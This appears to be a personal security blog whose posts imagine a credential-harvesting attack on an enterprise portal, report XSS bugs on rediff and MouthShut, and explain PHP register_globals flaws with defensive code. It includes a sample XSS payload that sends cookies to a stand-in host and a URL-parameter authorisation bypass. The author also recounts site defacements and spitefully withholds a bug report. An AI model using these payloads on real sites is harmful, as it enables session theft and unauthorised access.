Oct 25

This post is going to be technical: some truth, some imagination and a bunch of assumptions.

My first assumption is - there is a big company with a portal that is the primary means of doing many things across the company. Every employee gets access to the portal and uses it daily.

My second assumption is - the company turns new-technology oriented and starts its own wiki, micro-blogging or even blogging platform within the enterprise.

My third assumption is - the company picks an open source solution for the tool and modifies it heavily, so that by the time it opens the tool to regular employees, the upstream open source project has already released an upgrade that patches vulnerabilities present in the version they started from.

My fourth assumption is - having put in the effort to modify the code so that it works seamlessly with the current environment, the company will not take the further pain of upgrading to the newer version of the open source solution they are using.

Out of these four assumptions we get a situation with a weakest link: a modified-but-vulnerable open source solution integrated with the company's portal.

My brain's assuming part stops working here and the imagination part starts. When a new tool is integrated seamlessly with the portal, it will be using LDAP for authentication; that is easy to guess and just as easy to confirm. With LDAP in use, the next natural guess is the login flow: when a user tries to log in, if it is their first time, the open source solution creates a profile for them in its own database; otherwise it simply lets them in on the strength of the LDAP authentication.

All of the above works great as long as They are not concentrating on you. But when They do concentrate on you, the greatest code starts to look like simple, vulnerable code. As per the title, I'm going to write about "How Would They Do It?" Again, it's completely imagination, as I'm neither "good enough in skill" nor "bad enough in motive" to be one of Them. Let's see what They would do.

They will find that the recently added open source solution is the weakest part of the portal and try to find out its version. Knowing the version, they would look up the list of known vulnerabilities for it and try to exploit them. If they succeed at this point, they will try to get complete control over the open source solution, a.k.a. the new tool. They will make themselves admin on the new tool and look for ways to go further. Some current open source solutions are so advanced that they let an administrator edit the code of plugins, themes or even the core through the web interface. If not that advanced, they at least let the administrator take a backup of the complete database. Both cases are bad: the first is terrible, the second bad enough to hurt.

In the first case, where They have admin rights and can edit the code, They would simply edit it to do their work: make the solution write every user and their password to a new table on each successful authentication. Later they download that table of users with un-hashed passwords, which is the biggest thing that can go wrong for the whole portal, because these are the same LDAP credentials that open everything else in the company. Note that hashing in the directory does not help here: an LDAP bind needs the plaintext password, so it necessarily passes through the application, and a trojaned application can keep a copy. The total compromise.
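The check a practitioner would want against the "edit the code through the admin interface" step is a file-integrity baseline over the tree that editor can write to. The following is an added example, not part of the original post and not any particular product's code; it assumes a plugin directory layout of my own invention and builds a throw-away copy of it so it runs offline with php-cli.

```php
<?php
// Added example, not part of the original post and not any particular product's
// code: a baseline-and-verify integrity check for a directory that an in-app code
// editor can write to (a plugin/theme tree, say). Runs with php-cli on a
// throw-away directory it creates itself, so it needs no real install.

// Walk $root and return [relative path => sha256] for every regular file.
function hash_tree(string $root): array
{
    $hashes = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if ($file->isFile()) {
            $rel = substr($file->getPathname(), strlen($root) + 1);
            $hashes[$rel] = hash_file('sha256', $file->getPathname());
        }
    }
    ksort($hashes);
    return $hashes;
}

// Compare a stored baseline with the tree as it is now.
function verify_tree(string $root, array $baseline): array
{
    $now = hash_tree($root);
    $modified = [];
    foreach ($baseline as $path => $hash) {
        if (isset($now[$path]) && $now[$path] !== $hash) {
            $modified[] = $path;
        }
    }
    return [
        'modified' => $modified,
        'added'    => array_keys(array_diff_key($now, $baseline)),
        'missing'  => array_keys(array_diff_key($baseline, $now)),
    ];
}

// --- demo on a constructed plugin tree (hypothetical layout) ---
$root = sys_get_temp_dir() . '/plugins_' . bin2hex(random_bytes(4));
mkdir("$root/auth", 0700, true);
file_put_contents("$root/index.php", "<?php echo 'ok';\n");
file_put_contents("$root/auth/ldap.php", "<?php // bind to LDAP, never persist the password\n");

// Baseline taken right after deployment. In real use, write it somewhere the web
// application cannot modify (outside the web root, owned by a different user);
// otherwise an attacker with the code editor simply re-baselines after tampering.
$baseline = hash_tree($root);

// What the admin-level attacker from the post does: trojan the login hook to
// record credentials, and drop a helper file alongside it.
file_put_contents("$root/auth/ldap.php", "<?php // ... also INSERT \$user, \$pass into a new table\n");
file_put_contents("$root/auth/.helper.php", "<?php // dropped by the attacker\n");

print_r(verify_tree($root, $baseline));

// Tidy up the throw-away tree.
$walk = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
    RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($walk as $f) {
    $f->isDir() ? rmdir($f->getPathname()) : unlink($f->getPathname());
}
rmdir($root);
```

The verify step is designed to surface the tampered login hook as modified and the dropped file as added. Two design points matter more than the hashing itself: the baseline and the checker must live where the application's own user cannot write, and the check should run from a cron job or deployment pipeline rather than from inside the tool. Better still, turn the in-app code editor off altogether; most such engines have a setting for that, and an administrator who needs to change code can do it through version control instead.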

This is some stupid theory with lots of facts, assumptions and imagination in it. If you understand technology, you can understand the seriousness of the simple mistakes we make. If you don't understand technology, I didn't expect you to be so bored that you read this post!! And by the way, if you haven't understood who They are ... come on dude, it's the dream of every kid who uses a computer to become like Them and read their friends' emails. No more hints.

Oct 07

Well, when you hate something, you have to accept that it got your attention one way or another. So you tend to think about it. I'm no exception. Just because I hate rediff, I started looking for XSS (Cross Site Scripting) bugs in it. Well, there are a total of listed in XSSed, and I found a good number of them, enough to prove that rediff is a very badly coded portal. One can view this page to see the bugs and see the elite-ness of rediff.

The important vulnerable services offered by rediff include its homepages and shopping. If you remember those dark old days of orkut, when so-called hackers took over communities they hated, that was done by exploiting an XSS vulnerability in orkut at the time. Now you can understand that whoever has a homepage on rediff, and/or shops at rediff, is not using a secure service.

PS: Having an XSS in a site doesn't make it the worst site, as even MS, Google and Yahoo had/have them. Even the MNC I work for had a similar bug in its portal, but it was fixed as soon as they were notified through a specific channel. But I don't know why portals like rediff and mouthshut employ stubborn webmasters who hate to accept that their code has bugs. They must have either ignored or never read my mails.

Sep 23

The following is technology-related stuff, The Darker Side of Me, and a very, very, very long "essay" about me. Be warned.

Gone are the days when I didn't know how to shut down a Windows PC; when I used to call those so-called "engineers" to fix my PC and shell out an extra buck to get some games installed on my box. I remember the day my cousins made fun of me for switching off that PC as if the OS were DOS. Good old days and nights of "Age of Empires". Hours and hours of "Road Rash" and "Need for Speed". One fine day, which almost changed my life in a small way, a friend of my dad forgot the password for a Word document he kept and asked me whether I could do anything to find it.

That was the day I saw the darker side of the computing world, the security world. I searched on Google (at that time a cool new search engine, introduced to me by my cousin. Thank you, Ark) to find out how the password of a Word document can be cracked. I managed to find one program that could crack it, but it was shareware. Then I saw that it was software one has to buy, but my cousin Ark told me there was a program named "Serials2K" that would have a serial number for any software. I was pretty impressed by that software, but, being a little different, I wanted to know how those guys found the keys. My question was answered by a process named "Reverse Engineering". But that wasn't enough for me; I wanted to learn how to do it. Then I found a forum where some folks claimed to know that art and were teaching it there. That forum had over 4000 members with weird names, a.k.a. handles. I became one of them and started learning about computers.

But my skills weren't improving in the one I wanted to learn (Reverse Engineering) but in Social Engineering. I became one of the moderators of the board, then one of its administrators, then administered their IRC server. While I had admin access to the board, I learned PHP, Perl and Python. As part of my curriculum, I learned C, C++, Java and VB. Then, being at a board, I saw the culture of "clans", where members of other boards used to come to ours and spam/flame/do crap. Our answer was a simple defacement of their site, which introduced me to the lowest level of computer security skills. Then my interests changed to VIRUSes, and I collected the source code of 1000 viruses, through which I wanted to learn to code viruses, but I never earned those skills or simply never tried to be malicious.

Then came the greatest turn of my life, when I was introduced to a site named "try2hack", which dealt with so-called "hacking" simulations. This was the start of the brighter side of my internet life. I left all those kiddie and illegal things along with those boards, closed my clans, ditched those emails, forgot those net-friends a.k.a. clan mates (except one), solved all of the try2hack challenges within a couple of weeks, and then started looking for similar sites. That is when I finally found the site that helped me learn so many things: Net-Force.

Net-Force is a site that doesn't support any illegal a.k.a. hacking activities, but it gives a very good simulation of the real stuff. There are 8 categories (JavaScript, Java Applets, Cryptography, Exploits, Cracking, Programming, Internet and Steganography) with a total of 93 challenges, ranging from basic tutorials to very hard ones. I have managed to solve 82 of them so far. I learned something from each and every challenge, and I'm glad I did. The range of challenges is so wide that you will learn at least a little about a wide variety of topics.

I am what I am right now, with a little knowledge about a wide variety of topics: a jack of all trades. I have never mastered anything so far. But I want to be a master of one. I've chosen two topics in which I want to be more than a jack: one is XSS and the other is SQL injection. I have already started learning about XSS; my progress is at XSSed, an archive of XSS vulnerabilities in various web applications and sites, ordered by PageRank. I wish that one day I will be a master at something.

Aug 28

Uhmmm, will you guys understand if I start writing about XSS??? If you understand, good; if you don't, great, as it means you have so many other things in your life to worry about than mere security on a web site. But in order to understand what I'm writing here, you have to know a little about XSS - Cross Site Scripting.

XSS, in simple terms, is a security vulnerability in web applications that echo user-supplied input back into a page without encoding it, which lets an attacker inject script that runs in other users' browsers in the context of the vulnerable site. Such bugs can be exploited to craft convincing phishing attacks, hijack sessions and steal credentials.

Why am I writing about this? Yesterday I found a couple of XSSes in two big Indian web sites: Rediff and MouthShut. I've reported the vulnerability to MouthShut, but not to rediff (sorry rediff, I hate you). The screenshot below is the XSS in MouthShut. Unless they've fixed it, you can see it here.

As I hate rediff and didn't report to rediff, I don't want to post about rediff's XSS. But you can see that rediff is STUPID by giving some weird chars (hint: vulgar fraction for the ½-brained rediff) as input in its search box.
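To show what a reflecting search box like that looks like on the server side, here is an added example; it is not the code of rediff, MouthShut or any other site, and the attacker input in it is constructed for the demonstration. It puts the vulnerable pattern next to the fixed one.

```php
<?php
// Added example, not the code of rediff, MouthShut or any other site: a search
// page that echoes the query back, first as the vulnerable pattern and then with
// context-appropriate output encoding. Runs with php-cli; the input below is
// constructed to show the bug, not captured from any real site.

// Constructed attacker input: a search string that smuggles in a script tag.
$query = '<script>new Image().src="http://example.invalid/?c="+document.cookie</script>';

// Vulnerable: the raw query is concatenated into the HTML body, so a browser
// treats the <script> as markup and runs it in the site's origin.
function render_results_vulnerable(string $q): string
{
    return "<p>Results for: " . $q . "</p>";
}

// Encoder for HTML body and quoted-attribute contexts. ENT_QUOTES encodes both
// quote characters, so the same call is safe inside a quoted attribute; naming
// the charset explicitly matters because disagreement between the filter and the
// browser about how odd bytes decode is a classic way round an XSS filter.
function encode_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened: the query becomes text, never markup.
function render_results_hardened(string $q): string
{
    return "<p>Results for: " . encode_html($q) . "</p>";
}

// Attribute context: encode AND keep the attribute quoted, otherwise a space in
// the input is enough to start a new attribute such as onmouseover.
function render_search_box(string $q): string
{
    return '<input type="text" name="q" value="' . encode_html($q) . '">';
}

echo render_results_vulnerable($query), "\n";
echo render_results_hardened($query), "\n";
echo render_search_box($query), "\n";
```

Encoding on output, at the point where the data meets the HTML, is the fix; input "filtering" of a few dangerous characters is what sites that survive a plain `<script>` tag but still fall to unusual characters tend to rely on. The encoder above covers HTML body and quoted attributes only; a value placed inside a JavaScript block or a URL needs the encoding for that context instead.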

So, how do you escape from such attacks??? See my last post. Fire up your Fox with NoScript. It saves you from the bad guys of this world. That protects you as a visitor, though; the site itself is only fixed when it encodes user input before echoing it back into the page.

Aug 25

I deal with a little PHP at work. Some of my teammates also deal with PHP. One of my teammates, who left for another company, created a great application: a shopping cart with certain _damn_cool_ features. He used PHP to do some of the work.

Someone else wanted to see that tool again, and another teammate tried installing it on a laptop. He was reading the installation manual for the application, where I saw one point: "Set register_globals to ON".

As a security enthusiast, I read a lot about "how not to do it". I still remember the most controversial change in PHP: the default value of register_globals was changed from ON to OFF in PHP 4.2.0. When I came back to the scene, I could smell one thing: a possible security breach. Registering globals can be fatal for an application when the logic is bad.

Consider the following code snippet (taken from php.net):

<?php
// Vulnerable pattern from the php.net manual: $authorized is never initialised,
// so with register_globals on a request parameter can define it beforehand.
if (authenticated_user()) {
    $authorized = true;
}
if ($authorized) {
    include "/highly/sensitive/data.php";
}
?>

In the above snippet, if the user is authenticated, the variable $authorized is set to true. If $authorized is true, the highly sensitive data is included.

The logic doesn't look flawed from the outside. But it is very bad logic for such an application ... especially when register_globals is on.

When register_globals is on, anyone can create a global variable through a request: every GET, POST and cookie parameter is turned into a PHP variable of the same name before the script runs. Now, if we call the above code as

access.php?authorized=1

what happens? If I am an authenticated_user(), fine; I have every right to access the data. If I'm not, $authorized is still created with the value 1, because we supplied it in the GET request, and that gives me access to sensitive data I'm not allowed to see. Here this can be avoided by initialising $authorized to false at the top of the code, before the authentication check, so that whatever the request injected is overwritten.

You can read more about this security issue at php.net. If you are using PHP older than 4.2.0, don't forget to set the register_globals directive to OFF, or take proper care to secure your code. If you are using PHP 4.2.0 or newer, you need not worry as much, as the default is OFF; but a hosting provider or an installation manual like the one above can turn it back on, so check your php.ini and initialise your variables anyway. This directive is going to be removed from PHP 6 onwards.
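The following is an added example, not from php.net or the original post. It simulates what register_globals does by extract()ing a constructed request into the local scope, then runs the manual's vulnerable check and the initialise-first fix against the same request, so the difference can be seen with php-cli and no php.ini change.

```php
<?php
// Added example, not from php.net or the original post: simulates what
// register_globals=On did by extract()ing a constructed request array into the
// local scope, then runs the manual's vulnerable check and a hardened one
// against the same request. Runs with php-cli; no php.ini change is needed.

// Constructed request from an anonymous visitor: access.php?authorized=1
$request = ['authorized' => '1'];

// Stand-in for the real session/LDAP check; this visitor is NOT logged in.
function authenticated_user(): bool
{
    return false;
}

// Vulnerable pattern: relies on $authorized simply not existing for
// unauthenticated users. extract() here plays the role of register_globals,
// which did exactly this for every GET, POST and cookie parameter.
function vulnerable_check(array $request): bool
{
    extract($request);
    if (authenticated_user()) {
        $authorized = true;
    }
    return !empty($authorized);
}

// Hardened pattern: initialise every security-relevant variable before use, so
// whatever the request injected is overwritten, and never derive authorisation
// from anything the client can name. The request is still extracted first to
// show the fix holds even with register_globals left on.
function hardened_check(array $request): bool
{
    extract($request);
    $authorized = false;
    if (authenticated_user()) {
        $authorized = true;
    }
    return $authorized;
}

var_dump(vulnerable_check($request));
var_dump(hardened_check($request));
```

The extract() call stands in for the directive only; real code should never extract() request data at all and should read parameters explicitly through $_GET, $_POST or $_COOKIE, which makes the source of every value visible in the code. Initialising the flag first is the minimal fix for legacy code that has to run where register_globals cannot be turned off.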